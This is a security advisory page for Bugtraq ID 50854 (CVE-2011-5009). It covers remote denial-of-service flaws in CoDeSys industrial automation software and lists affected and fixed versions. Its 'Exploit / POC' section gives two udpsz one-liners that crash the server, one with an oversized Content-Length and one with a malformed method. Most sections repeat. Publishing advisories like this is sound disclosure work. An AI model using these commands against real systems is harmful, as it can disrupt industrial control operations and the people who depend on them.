CoDeSys Multiple Remote Denial of Service Vulnerabilities
BID:50854
Info
CoDeSys Multiple Remote Denial of Service Vulnerabilities
| Bugtraq ID: | 50854 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2011-5009 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 30 2011 12:00AM |
| Updated: | Jan 10 2012 08:00PM |
| Credit: | Luigi Auriemma |
| Vulnerable: |
3S - Smart Software Solutions GmbH CoDeSys 3.4 SP4 Patch 2 3S - Smart Software Solutions GmbH CoDeSys 3.4 3S - Smart Software Solutions GmbH CoDeSys 2.3 |
| Not Vulnerable: |
3S - Smart Software Solutions GmbH CoDeSys 3.5 3S - Smart Software Solutions GmbH CoDeSys 2.3.9.32 |
Discussion
CoDeSys Multiple Remote Denial of Service Vulnerabilities
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
Exploit / POC
CoDeSys Multiple Remote Denial of Service Vulnerabilities
The following exploits is available:
udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1
udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1
The following exploits is available:
udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1
udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1
Solution / Fix
CoDeSys Multiple Remote Denial of Service Vulnerabilities
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
CoDeSys Multiple Remote Denial of Service Vulnerabilities
References:
References: